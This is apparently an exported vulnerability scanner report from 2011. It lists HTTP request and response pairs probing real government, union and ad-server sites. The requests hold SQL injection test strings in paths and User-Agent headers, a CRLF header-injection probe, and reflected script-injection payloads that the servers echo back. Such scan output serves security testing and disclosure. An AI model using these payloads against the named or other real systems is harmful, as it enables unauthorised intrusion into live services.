| GET /portal/server.pt/gateway%2527/PTARGS_0_2_24825_2966 Host: pa.gov Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ASP.NET_SessionId |
| HTTP/1.1 200 OK Connection: close Date: Sat, 30 Apr 2011 12:24:46 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 PT-HTTPResponse-Type: SESSION_TIMEOUT PT-Login-URL: http://pa.gov/portal Pragma: no-cache Content-Language: en Set-Cookie: plloginoccured=false; path=/ Set-Cookie: REQUESTURLBEFORESSO=; path=/ Expires: 1304079886386 Cache-Control: no-store, no-cache, must-revalidate, max-age=0, post-check=0, pre-check=0 Last-Modified: 1304166286386 Content-Type: text/html; charset=utf-8 Content-Length: 33558 <html> <head><link type="text/css" href="http://www.portal ...[SNIP]... ject, like a hashtable. **/ var gSafeJSVarContainer = new Object(); /** Define a new safe variable, pass the in the name and the value.Returns true if successful, method call will fail if the value is invalid. **/ function addSafeVar(strName, oValue) { gSafeJSVarContainer return true; } /** Retrieve a safe var. Returns false if the variable is undefined or if the value is actually fal ...[SNIP]... |
| GET /portal/server.pt/gateway%2527%2527/PTARGS_0_2_24825_2966 Host: pa.gov Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ASP.NET_SessionId |
| HTTP/1.1 302 Found Connection: close Date: Sat, 30 Apr 2011 12:24:46 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: /portal/SSORedirect.aspx? Set-Cookie: plloginoccured=false; path=/ Set-Cookie: REQUESTURLBEFORESSO=http: Set-Cookie: ASP.NET_SessionId=; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 357 <html><head><title>Object moved</title></head><body <h2>Object moved to <a href="/portal/SSORedirect </body></html> <!--Hostname: ENCTCISP270--><!--Total Request Time: -1 Con ...[SNIP]... |
| Severity: | High |
| Confidence: | Tentative |
| Host: | http://pa.gov |
| Path: | /portal/server.pt/gateway |
| GET /portal/server.pt/gateway'/PTARGS_0_2_24879_2966 Host: pa.gov Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ASP.NET_SessionId |
| HTTP/1.1 200 OK Connection: close Date: Sat, 30 Apr 2011 12:24:43 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 PT-HTTPResponse-Type: SESSION_TIMEOUT PT-Login-URL: http://pa.gov/portal Pragma: no-cache Content-Language: en Set-Cookie: plloginoccured=false; path=/ Set-Cookie: REQUESTURLBEFORESSO=; path=/ Expires: 1304079883339 Cache-Control: no-store, no-cache, must-revalidate, max-age=0, post-check=0, pre-check=0 Last-Modified: 1304166283339 Content-Type: text/html; charset=utf-8 Content-Length: 33559 <html> <head><link type="text/css" href="http://www.portal ...[SNIP]... ject, like a hashtable. **/ var gSafeJSVarContainer = new Object(); /** Define a new safe variable, pass the in the name and the value.Returns true if successful, method call will fail if the value is invalid. **/ function addSafeVar(strName, oValue) { gSafeJSVarContainer return true; } /** Retrieve a safe var. Returns false if the variable is undefined or if the value is actually fal ...[SNIP]... |
| GET /portal/server.pt/gateway''/PTARGS_0_2_24879_2966 Host: pa.gov Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ASP.NET_SessionId |
| HTTP/1.1 302 Found Connection: close Date: Sat, 30 Apr 2011 12:24:43 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: /portal/SSORedirect.aspx? Set-Cookie: plloginoccured=false; path=/ Set-Cookie: REQUESTURLBEFORESSO=http: Set-Cookie: ASP.NET_SessionId=; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 358 <html><head><title>Object moved</title></head><body <h2>Object moved to <a href="/portal/SSORedirect </body></html> <!--Hostname: ENCTCISP270--><!--Total Request Time: -1 Con ...[SNIP]... |
| Severity: | High |
| Confidence: | Tentative |
| Host: | http://www.alabama.gov |
| Path: | /portal/index.jsp |
| GET /portal/index.jsp HTTP/1.1 Host: www.alabama.gov Proxy-Connection: keep-alive Referer: http://al.gov/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16'%20and%201%3d1--%20 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.1 200 OK Date: Sat, 30 Apr 2011 01:15:53 GMT Server: Apache/1.3.41 (Unix) Resin/3.0.25 Cache-Control: private Set-Cookie: JSESSIONID=abczMjORTQ Content-Type: text/html Content-Length: 34766 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equ ...[SNIP]... <a href='http://www.alabama <br /> <a href='http://www.alabama <br /> </div> </td> <td> </td> <td> <div class="footer_links"> <img src="/images/trans <img src="/images/trans_german <img src="/images/trans_korean <img src="/images/trans </div> </td> <td> <div class="footer_links"> ...[SNIP]... |
| GET /portal/index.jsp HTTP/1.1 Host: www.alabama.gov Proxy-Connection: keep-alive Referer: http://al.gov/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16'%20and%201%3d2--%20 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.1 200 OK Date: Sat, 30 Apr 2011 01:15:50 GMT Server: Apache/1.3.41 (Unix) Resin/3.0.25 Cache-Control: private Set-Cookie: JSESSIONID=abc3n9TTHLjN- Content-Type: text/html Content-Length: 34756 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equ ...[SNIP]... <a href='http://www.alabama <br /> <a href='http://www.alabama <br /> </div> </td> <td> </td> <td> <div class="footer_links"> <img src="/images/trans <img src="/images/trans_german <img src="/images/trans_korean <img src="/images/trans </div> </td> <td> <div class="footer_links"> ...[SNIP]... |
| Severity: | High |
| Confidence: | Tentative |
| Host: | http://www.budget.state |
| Path: | /portal/server.pt/gateway |
| GET /portal/server.pt/gateway'/PTARGS_0_2_38668_4566 Host: www.budget.state.pa.us Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ASP.NET_SessionId |
| HTTP/1.1 200 OK Connection: close Date: Sat, 30 Apr 2011 12:29:58 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 PT-HTTPResponse-Type: SESSION_TIMEOUT PT-Login-URL: http://www.budget.state Pragma: no-cache Content-Language: en Set-Cookie: plloginoccured=false; path=/ Set-Cookie: REQUESTURLBEFORESSO=; path=/ Expires: 1304080198730 Cache-Control: no-store, no-cache, must-revalidate, max-age=0, post-check=0, pre-check=0 Last-Modified: 1304166598730 Content-Type: text/html; charset=utf-8 Content-Length: 26799 <html> <head><link type="text/css" href="http://www.portal ...[SNIP]... ject, like a hashtable. **/ var gSafeJSVarContainer = new Object(); /** Define a new safe variable, pass the in the name and the value.Returns true if successful, method call will fail if the value is invalid. **/ function addSafeVar(strName, oValue) { gSafeJSVarContainer return true; } /** Retrieve a safe var. Returns false if the variable is undefined or if the value is actually fal ...[SNIP]... |
| GET /portal/server.pt/gateway''/PTARGS_0_2_38668_4566 Host: www.budget.state.pa.us Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ASP.NET_SessionId |
| HTTP/1.1 302 Found Connection: close Date: Sat, 30 Apr 2011 12:29:58 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: /portal/SSORedirect.aspx? Set-Cookie: plloginoccured=false; path=/ Set-Cookie: REQUESTURLBEFORESSO=http: Set-Cookie: ASP.NET_SessionId=; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 357 <html><head><title>Object moved</title></head><body <h2>Object moved to <a href="/portal/SSORedirect </body></html> <!--Hostname: ENCTCISP270--><!--Total Request Time: -1 Con ...[SNIP]... |
| Severity: | High |
| Confidence: | Tentative |
| Host: | http://www.budget.state |
| Path: | /portal/server.pt/gateway |
| GET /portal/server.pt/gateway%2527/PTARGS_0_2_39070_4566 Host: www.budget.state.pa.us Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ASP.NET_SessionId |
| HTTP/1.1 200 OK Connection: close Date: Sat, 30 Apr 2011 12:29:55 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 PT-HTTPResponse-Type: SESSION_TIMEOUT PT-Login-URL: http://www.budget.state Pragma: no-cache Content-Language: en Set-Cookie: plloginoccured=false; path=/ Set-Cookie: REQUESTURLBEFORESSO=; path=/ Expires: 1304080195683 Cache-Control: no-store, no-cache, must-revalidate, max-age=0, post-check=0, pre-check=0 Last-Modified: 1304166595683 Content-Type: text/html; charset=utf-8 Content-Length: 26799 <html> <head><link type="text/css" href="http://www.portal ...[SNIP]... ject, like a hashtable. **/ var gSafeJSVarContainer = new Object(); /** Define a new safe variable, pass the in the name and the value.Returns true if successful, method call will fail if the value is invalid. **/ function addSafeVar(strName, oValue) { gSafeJSVarContainer return true; } /** Retrieve a safe var. Returns false if the variable is undefined or if the value is actually fal ...[SNIP]... |
| GET /portal/server.pt/gateway%2527%2527/PTARGS_0_2_39070_4566 Host: www.budget.state.pa.us Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ASP.NET_SessionId |
| HTTP/1.1 302 Found Connection: close Date: Sat, 30 Apr 2011 12:29:55 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: /portal/SSORedirect.aspx? Set-Cookie: plloginoccured=false; path=/ Set-Cookie: REQUESTURLBEFORESSO=http: Set-Cookie: ASP.NET_SessionId=; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 357 <html><head><title>Object moved</title></head><body <h2>Object moved to <a href="/portal/SSORedirect </body></html> <!--Hostname: ENCTCISP270--><!--Total Request Time: -1 Con ...[SNIP]... |
| Severity: | High |
| Confidence: | Tentative |
| Host: | http://www.vsea.org |
| Path: | /join-your-union |
| GET /join-your-union?1'=1 HTTP/1.1 Host: www.vsea.org Proxy-Connection: keep-alive Referer: http://www.vsea.org/join User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: SESSc2e79101469fa43c |
| HTTP/1.1 200 OK Date: Sat, 30 Apr 2011 01:17:12 GMT Server: Apache/2.2.9 (Debian) mod_fastcgi/2.4.6 mod_fcgid/2.3.5 mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0 X-Powered-By: PHP/5.2.6-1+lenny9 Expires: Sun, 19 Nov 1978 05:00:00 GMT Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0 Last-Modified: Sat, 30 Apr 2011 01:17:12 GMT Vary: User-Agent,Accept Content-Type: text/html; charset=utf-8 Content-Length: 39898 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Joi ...[SNIP]... <script type="text/javascript">$ ...[SNIP]... |
| GET /join-your-union?1''=1 HTTP/1.1 Host: www.vsea.org Proxy-Connection: keep-alive Referer: http://www.vsea.org/join User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: SESSc2e79101469fa43c |
| HTTP/1.1 200 OK Date: Sat, 30 Apr 2011 01:17:14 GMT Server: Apache/2.2.9 (Debian) mod_fastcgi/2.4.6 mod_fcgid/2.3.5 mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0 X-Powered-By: PHP/5.2.6-1+lenny9 Expires: Sun, 19 Nov 1978 05:00:00 GMT Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0 Last-Modified: Sat, 30 Apr 2011 01:17:14 GMT Vary: User-Agent,Accept Content-Type: text/html; charset=utf-8 Content-Length: 39526 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Joi ...[SNIP]... |
| Severity: | High |
| Confidence: | Tentative |
| Host: | http://www.vsea.org |
| Path: | /sites/vsea.org/themes |
| GET /sites/vsea.org/themes%2527/unionproud2/favicon.ico HTTP/1.1 Host: www.vsea.org Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: SESSc2e79101469fa43c |
| HTTP/1.1 404 Not Found Date: Fri, 29 Apr 2011 22:20:01 GMT Server: Apache/2.2.9 (Debian) mod_fastcgi/2.4.6 mod_fcgid/2.3.5 mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0 X-Powered-By: PHP/5.2.6-1+lenny9 Expires: Sun, 19 Nov 1978 05:00:00 GMT Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0 Last-Modified: Fri, 29 Apr 2011 22:20:03 GMT Vary: User-Agent,Accept Content-Type: text/html; charset=utf-8 Content-Length: 32193 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Pag ...[SNIP]... <script type="text/javascript">$ ...[SNIP]... |
| GET /sites/vsea.org/themes%2527%2527/unionproud2/favicon.ico HTTP/1.1 Host: www.vsea.org Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: SESSc2e79101469fa43c |
| HTTP/1.1 404 Not Found Date: Fri, 29 Apr 2011 22:20:05 GMT Server: Apache/2.2.9 (Debian) mod_fastcgi/2.4.6 mod_fcgid/2.3.5 mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0 X-Powered-By: PHP/5.2.6-1+lenny9 Expires: Sun, 19 Nov 1978 05:00:00 GMT Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0 Last-Modified: Fri, 29 Apr 2011 22:20:05 GMT Vary: User-Agent,Accept Content-Type: text/html; charset=utf-8 Content-Length: 31877 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Pag ...[SNIP]... |
| Severity: | High |
| Confidence: | Tentative |
| Host: | http://www.vsea.org |
| Path: | /sites/vsea.org/themes |
| GET /sites/vsea.org/themes%2527/unionproud2/splash_flash Host: www.vsea.org Proxy-Connection: keep-alive Referer: http://www.vsea.org/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: SESSc2e79101469fa43c |
| HTTP/1.1 404 Not Found Date: Sat, 30 Apr 2011 01:19:01 GMT Server: Apache/2.2.9 (Debian) mod_fastcgi/2.4.6 mod_fcgid/2.3.5 mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0 X-Powered-By: PHP/5.2.6-1+lenny9 Expires: Sun, 19 Nov 1978 05:00:00 GMT Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0 Last-Modified: Sat, 30 Apr 2011 01:19:01 GMT Vary: User-Agent,Accept Content-Type: text/html; charset=utf-8 Content-Length: 32289 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Pag ...[SNIP]... <script type="text/javascript">$ ...[SNIP]... |
| GET /sites/vsea.org/themes%2527%2527/unionproud2/splash_flash Host: www.vsea.org Proxy-Connection: keep-alive Referer: http://www.vsea.org/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: SESSc2e79101469fa43c |
| HTTP/1.1 404 Not Found Date: Sat, 30 Apr 2011 01:19:03 GMT Server: Apache/2.2.9 (Debian) mod_fastcgi/2.4.6 mod_fcgid/2.3.5 mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0 X-Powered-By: PHP/5.2.6-1+lenny9 Expires: Sun, 19 Nov 1978 05:00:00 GMT Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0 Last-Modified: Sat, 30 Apr 2011 01:19:03 GMT Vary: User-Agent,Accept Content-Type: text/html; charset=utf-8 Content-Length: 31909 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Pag ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://bs.serving-sys.com |
| Path: | /BurstingPipe/adServer.bs |
| GET /BurstingPipe/adServer.bs Host: bs.serving-sys.com Proxy-Connection: keep-alive Referer: http://io9.com/static/ad Origin: http://io9.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html Expires: Sun, 05-Jun-2005 22:00:00 GMT Vary: Accept-Encoding Set-Cookie: u2=a3ac447e-4ff7-4236 Set-Cookie: eyeblaster=BWVal=e49bd 59c112e0288&BWDate=40663.346366 P3P: CP="NOI DEVa OUR BUS UNI" Date: Sat, 30 Apr 2011 12:18:45 GMT Connection: close Content-Length: 0 |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://bs.serving-sys.com |
| Path: | /BurstingPipe/adServer.bs |
| GET /BurstingPipe/adServer.bs Host: bs.serving-sys.com Proxy-Connection: keep-alive Referer: http://io9.com/static/ad Origin: http://io9.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html Expires: Sun, 05-Jun-2005 22:00:00 GMT Vary: Accept-Encoding Set-Cookie: u2=870212d3-2f21-4fa2 Set-Cookie: eyeblaster=BWVal=737 cccbab88b97&RES=128&WMPV=0; expires=Fri, 29-Jul-2011 08: 18:45 GMT; domain=bs.serving-sys.com P3P: CP="NOI DEVa OUR BUS UNI" Date: Sat, 30 Apr 2011 12:18:45 GMT Connection: close Content-Length: 0 |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://bs.serving-sys.com |
| Path: | /BurstingPipe/adServer.bs |
| GET /BurstingPipe/adServer.bs Host: bs.serving-sys.com Proxy-Connection: keep-alive Referer: http://io9.com/static/ad Origin: http://io9.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html Expires: Sun, 05-Jun-2005 22:00:00 GMT Vary: Accept-Encoding Set-Cookie: u2=84d88477-c309-4ed1 Set-Cookie: eyeblaster=BWVal=737 2a2f0567f4f&WMPV=0; expires=Fri, 29-Jul-2011 08: 18:45 GMT; domain=bs.serving-sys.com P3P: CP="NOI DEVa OUR BUS UNI" Date: Sat, 30 Apr 2011 12:18:44 GMT Connection: close Content-Length: 0 |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://bs.serving-sys.com |
| Path: | /BurstingPipe/adServer.bs |
| GET /BurstingPipe/adServer.bs Host: bs.serving-sys.com Proxy-Connection: keep-alive Referer: http://io9.com/static/ad Origin: http://io9.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html Expires: Sun, 05-Jun-2005 22:00:00 GMT Vary: Accept-Encoding Set-Cookie: u2=aef03abd-dd91-446d Set-Cookie: eyeblaster=BWVal=737 ce2df32a2d8; expires=Fri, 29-Jul-2011 08: 18:45 GMT; domain=bs.serving-sys.com P3P: CP="NOI DEVa OUR BUS UNI" Date: Sat, 30 Apr 2011 12:18:45 GMT Connection: close Content-Length: 0 |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://wbtdcs.nara.gov |
| Path: | /dcs5w0txb10000wocrv |
| GET /e8809%0d%0a3db0a68c794/dcs.gif?&dcsdat Host: wbtdcs.nara.gov Proxy-Connection: keep-alive Referer: http://www.archives.gov User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.1 302 Found Date: Sat, 30 Apr 2011 00:49:38 GMT Server: Apache Location: /e8809 3db0a68c794/dcs.gif?dcsredirect=1 Set-Cookie: WEBTRENDS_ID=173.193.214 Last-Modified: Fri, 10 Mar 2006 19:37:06 GMT ETag: "3d-2b-1e369c80" Accept-Ranges: bytes Content-Length: 43 Connection: close Content-Type: image/gif GIF89a.............!..... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://ads.adbrite.com |
| Path: | /adserver/vdi/711384 |
| GET /adserver/vdi/711384eb4e8<script>alert(1)< Host: ads.adbrite.com Proxy-Connection: keep-alive Referer: http://www.kodakgallery User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: Apache="168362049x0.049 |
| HTTP/1.1 400 Bad Request Accept-Ranges: none Date: Sat, 30 Apr 2011 15:09:00 GMT Server: XPEHb/1.0 Content-Length: 78 Unsupported URL: /adserver/vdi/711384eb4e8<script>alert(1)< |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://agency.govern |
| Path: | /tennessee/default.cfm |
| GET /tennessee/default.cfm?e3bda"><script>alert(1)< Host: agency.governmentjobs.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Connection: close Date: Sat, 30 Apr 2011 12:19:02 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Language: en-US Content-Type: text/html; charset=UTF-8 <!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html dir="ltr" x ...[SNIP]... <form autocomplete="off" name="frmSort" action="http://agency ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | https://assist.dhss |
| Path: | /PGM/ASP/SC001.asp |
| POST /PGM/ASP/SC001.asp HTTP/1.1 Host: assist.dhss.delaware.gov Connection: keep-alive Referer: https://assist.dhss Cache-Control: max-age=0 Origin: https://assist.dhss User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASPSESSIONIDACRDBQAB Content-Length: 388 hdn_ApplicationNum=&hdn ...[SNIP]... |
| HTTP/1.1 500 Internal Server Error Set-Cookie: assist-persist=170663852 Date: Sat, 30 Apr 2011 00:40:01 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Pragma: no-cache Content-Length: 11586 Content-Type: text/html Expires: Sat, 30 Apr 2011 00:40:00 GMT Cache-control: no-cache <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html LANG="EN"> <head> <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1"> <meta HTTP-EQUIV="Pragma" CONTENT ...[SNIP]... <TD width='70%' align='left' valign='top'>87835"><script>alert(1)< ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | https://assist.dhss |
| Path: | /PGM/ASP/SC020.asp |
| GET /PGM/ASP/SC020.asp?hdn Host: assist.dhss.delaware.gov Connection: keep-alive Referer: https://assist.dhss Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASPSESSIONIDACRDBQAB |
| HTTP/1.1 200 OK Set-Cookie: assist-persist=170663852 Date: Sat, 30 Apr 2011 00:38:23 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Pragma: no-cache Content-Length: 10740 Content-Type: text/html Expires: Sat, 30 Apr 2011 00:38:22 GMT Cache-control: no-cache <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html LANG="en"> <head> <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1"> <meta HTTP-EQUIV="Pragma" CONTE ...[SNIP]... <input TYPE="Hidden" ID="hdn_Language" NAME="hdn_Language" VALUE="EN974ab"><script>alert(1)< ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://badge.dopiaza.org |
| Path: | /flickr/badge.php |
| GET /flickr/badge.php?user Host: badge.dopiaza.org Proxy-Connection: keep-alive Referer: http://www.tn.gov User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.1 200 OK Date: Sat, 30 Apr 2011 00:44:40 GMT Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch X-Powered-By: PHP/5.2.6-1+lenny9 Set-Cookie: PHPSESSID=0b45eb9ced Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding,User Content-Type: text/javascript Content-Length: 2419 jsonp130412404/102af<script>alert(1)< ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://badge.dopiaza.org |
| Path: | /flickr/badge.php |
